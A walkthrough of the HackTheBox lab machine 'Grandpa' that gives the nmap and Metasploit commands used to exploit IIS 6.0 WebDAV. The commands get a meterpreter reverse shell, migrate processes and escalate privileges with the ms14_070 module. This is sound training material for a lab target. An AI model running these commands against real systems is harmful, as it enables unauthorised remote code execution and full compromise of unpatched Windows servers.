Grandpa — HackTheBox

Hello guys, this is a walkthrough for ‘Grandpa’ from ‘hackthebox’.

Whenever I get a machine, I always start with enumerating the target machine using the following ‘nmap’ command:

nmap -sV -O -F — version-light 10.10.10.1 4

Now we know that Microsoft IIS httpd 6.0 is running on port 80. On visiting the website

Hmm…The website looks like it is under construction. I tried using wfuzz, but nothing worked. So, I googled about ‘Microsoft IIS httpd 6.0 exploits’ and got this.

Then, I opened msfconsole and used the following commands

use exploit/windows/iis/iis_webdav_scstoragepathfromurl

set RHOSTS 10.10.10.14

set LHOST <Your IP>

run

The module worked and I got a meterpreter shell. However, I couldn’t get anything out of it because the current user didn’t have enough privileges. I tried to escalate, but nothing gave me the permissions.

After a while, I tried to figure out a program that was running as both the superuser and the current user for escalating the privilege. But, luck didn’t favour. On listing all the processes using ‘ps’, I found that some processes were owned by ‘NT AUTHORITY\NETWORK SERVICE’ user and I was running under ‘rundll32.exe’ which had no user ownership. Therefore, I migrated to ‘davcdata.exe’.

After finishing the migration, I thought I’d use ‘post/multi/recon/local_exploit suggester’ to find more exploit about the current session.

I ran the module on session 1 and got 6 exploits. Then, I started trying the third exploit ‘exploit/windows/local/ms14_070_tcpip_ioctl’ and it helped me to elevate the privileges. I used the following commands

use exploit/windows/local/ms14_070_tcpip_ioctl

show options

set session <your session number>

set lhost <your ip>

set lport <your port>

run

I got the user flag from C:\Documents and Settings\Harry\Desktop\user.txt and root flag from C:\Documents and Settings\Administrator\Desktop\root.txt

Thanks for the read.